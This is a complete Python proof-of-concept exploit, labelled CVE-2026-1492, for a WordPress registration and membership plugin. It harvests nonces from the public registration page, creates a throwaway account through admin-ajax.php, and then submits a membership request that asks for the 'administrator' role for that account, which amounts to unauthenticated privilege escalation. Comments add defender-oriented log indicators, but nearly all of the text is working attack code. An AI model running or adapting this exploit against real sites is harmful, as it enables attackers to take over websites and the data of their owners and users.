import requests
import re
import random
import argparse
import textwrap
import json
from bs4 import BeautifulSoup

# Proof-of-concept for CVE-2026-1492 (per the argparse description below).
# Flow, as written: (1) GET the registration page and harvest the form id,
# nonces and a membership id from the HTML/inline JS; (2) POST to
# wp-admin/admin-ajax.php with action=user_registration_user_form_submit to
# create a user; (3) POST again with
# action=user_registration_membership_register_member, where the client
# supplies the "role" value for that user.
# Defender's notes: both requests are ordinary admin-ajax.php POSTs, so the
# action names above plus a members_data JSON body carrying
# "role": "administrator" are the concrete log indicators this script
# leaves; the registration step is a distinct event from the role-bearing
# membership step. Whether the role value is honoured server-side is what the
# CVE describes, not anything this script checks — the only mitigation is the
# vendor fix for CVE-2026-1492 (version not given on this page).

# =========================
# COLORS
# =========================
GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
RESET = "\033[0m"


def info(msg):
    """Print *msg* as a yellow ``[*]`` status line."""
    print(f"{YELLOW}[*]{RESET} {msg}")


def success(msg):
    """Print *msg* as a green ``[+]`` result line."""
    print(f"{GREEN}[+]{RESET} {msg}")


def error(msg):
    """Print *msg* as a red ``[-]`` failure line."""
    print(f"{RED}[-]{RESET} {msg}")


# =========================
# GENERATION USER
# =========================
# Throwaway credentials for the account the script registers. The username
# is randomised per run (user1000..user9999); the password is a fixed
# literal, so any account this script creates is trivially guessable and
# should be removed during clean-up.
USERNAME = "user" + str(random.randint(1000, 9999))
EMAIL = USERNAME + "@gmail.com"
PASSWORD = "pass"

# Field list serialised into the "form_data" parameter of the registration
# request; the field_name values mirror the plugin's own input names.
form_data = [
    {"field_name": "user_login", "value": USERNAME, "field_type": "text", "label": "Username"},
    {"field_name": "user_email", "value": EMAIL, "field_type": "email", "label": "User Email"},
    {"field_name": "user_pass", "value": PASSWORD, "field_type": "password", "label": "User Password"},
    {"field_name": "user_confirm_password", "value": PASSWORD, "field_type": "password", "label": "Confirm Password"}
]

# =========================
# EXTRACTION TOKENS + MEMBERSHIP
# =========================
def extract_all(session, url):
    """Fetch the registration page and harvest the values later requests need.

    Args:
        session: a ``requests.Session`` (cookies from this GET are reused
            by the POSTs in ``__main__``).
        url: the public registration page URL.

    Returns:
        ``(form_id, frontend_nonce, security, wpnonce, membership_id)``;
        any element is ``None`` when the corresponding input or inline
        script was not found. No HTTP status check is performed, so a
        non-200 page simply yields ``None`` values.
    """
    r = session.get(url)
    html = r.text
    soup = BeautifulSoup(html, "html.parser")
    form_id = None
    frontend_nonce = None
    security = None
    wpnonce = None
    membership_id = None
    # Hidden inputs carry the form id and the per-form nonce; the membership
    # id comes from a radio input named urm_membership (last one wins).
    for inp in soup.find_all("input"):
        name = inp.get("name")
        value = inp.get("value")
        if value:
            if name == "ur-user-form-id":
                form_id = value
            if name == "ur_frontend_form_nonce":
                frontend_nonce = value
            if inp.get("type") == "radio" and inp.get("name") == "urm_membership":
                membership_id = value
    # The remaining two nonces are emitted by wp_localize_script-style inline
    # JS; concatenate the relevant <script> bodies and regex the JSON out.
    js_content = ""
    for script in soup.find_all("script"):
        content = script.string or script.get_text()
        if not content:
            continue
        if "user_registration_params" in content:
            js_content += content
        if "ur_membership_frontend_localized_data" in content:
            js_content += content
    # Non-greedy match up to the first "};" — assumes the object literal
    # contains no nested "};" sequence (json.loads raises otherwise).
    match = re.search(r'var user_registration_params = (\{.*?\});', js_content, re.DOTALL)
    if match:
        data = json.loads(match.group(1))
        security = data.get("user_registration_form_data_save")
    match = re.search(r'var ur_membership_frontend_localized_data = (\{.*?\});', js_content, re.DOTALL)
    if match:
        data = json.loads(match.group(1))
        wpnonce = data.get("_nonce")
    return form_id, frontend_nonce, security, wpnonce, membership_id


# =========================
# MAIN
# =========================
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='CVE-2026-1492 Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent('''Example: python3 poc.py -t http://localhost:5000 -ru http://localhost:5000/?page_id=6 ''')
    )
    parser.add_argument('-t', '--target', required=True)
    parser.add_argument('-ru', '--registration-url', required=True)
    parser.add_argument('--debug', action='store_true', help='Show raw requests')
    args = parser.parse_args()
    session = requests.Session()
    # Browser-like headers; Origin/Referer are set to the target so the
    # admin-ajax endpoint sees a same-site-looking request.
    headers = {
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.9",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": args.target,
        "Referer": args.registration_url,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36",
        "X-Requested-With": "XMLHttpRequest"
    }
    # =========================
    # EXTRACTION
    # =========================
    info("Extracting tokens...")
    form_id, frontend_nonce, security, wpnonce, membership_id = extract_all(session, args.registration_url)
    # Note: a None in any of these is printed but not treated as fatal; the
    # POSTs below are sent regardless.
    success(f"form_id: {form_id}")
    success(f"frontend_nonce: {frontend_nonce}")
    success(f"security: {security}")
    success(f"wpnonce: {wpnonce}")
    success(f"membership_id: {membership_id}")
    # =========================
    # REGISTER
    # =========================
    # Step 2: normal plugin registration through admin-ajax.php. This is the
    # same request a browser would make from the public form.
    info("Sending registration request...")
    ajax_url = args.target + "/wp-admin/admin-ajax.php"
    payload1 = {
        "action": "user_registration_user_form_submit",
        "security": security,
        "form_data": json.dumps(form_data),
        "form_id": form_id,
        "registration_language": "en-US",
        "ur_frontend_form_nonce": frontend_nonce
    }
    r1 = session.post(ajax_url, headers=headers, data=payload1)
    # Bare except: any failure to decode JSON (including a WordPress "0" or
    # an HTML error page) is reported as "not JSON"; nothing is re-raised.
    try:
        r1_json = r1.json()
        if r1_json.get("success"):
            success(f"User created: {USERNAME}")
        else:
            error("Registration failed")
    except:
        error("Invalid response (not JSON)")
    # =========================
    # MEMBERSHIP / EXPLOIT
    # =========================
    # Step 3: the membership-registration action. The security-relevant
    # field is "role" inside the client-built members_data JSON — the
    # request asks for "administrator" for the account created above. The
    # whitespace-only values for switched_currency/urm_zone_id are reproduced
    # as captured; their meaning is not established by this script.
    info("Sending membership request...")
    members_data = {
        "role": "administrator",
        "membership": membership_id,
        "payment_method": "free",
        "start_date": "2026-3-20",
        "switched_currency": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t",
        "urm_zone_id": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t",
        "username": USERNAME
    }
    form_response = {
        "username": USERNAME,
        "success_message_positon": 1,
        "redirect_timeout": 0,
        "form_login_option": "default",
        "registration_type": "membership"
    }
    payload2 = {
        "action": "user_registration_membership_register_member",
        "members_data": json.dumps(members_data),
        "form_response": json.dumps(form_response),
        "_wpnonce": wpnonce
    }
    r2 = session.post(ajax_url, headers=headers, data=payload2)
    # "success" here only means the endpoint accepted the request; the
    # script does not verify the resulting role, hence "possible".
    try:
        r2_json = r2.json()
        if r2_json.get("success"):
            success("Membership applied → possible privilege escalation\n")
            info(f"Try logging in with:")
            print(f" Username: {USERNAME}")
            print(f" Password: {PASSWORD}\n")
            info(f"Then access:")
            print(f" {args.target}/wp-admin/")
        else:
            error("Membership failed")
    except:
        error("Invalid response (not JSON)")
    # =========================
    # DEBUG
    # =========================
    # Only the second (membership) request/response is dumped; r1 is not.
    if args.debug:
        print("\n[DEBUG] Request body:")
        print(r2.request.body)
        print("\n[DEBUG] Response:")
        print(r2.text)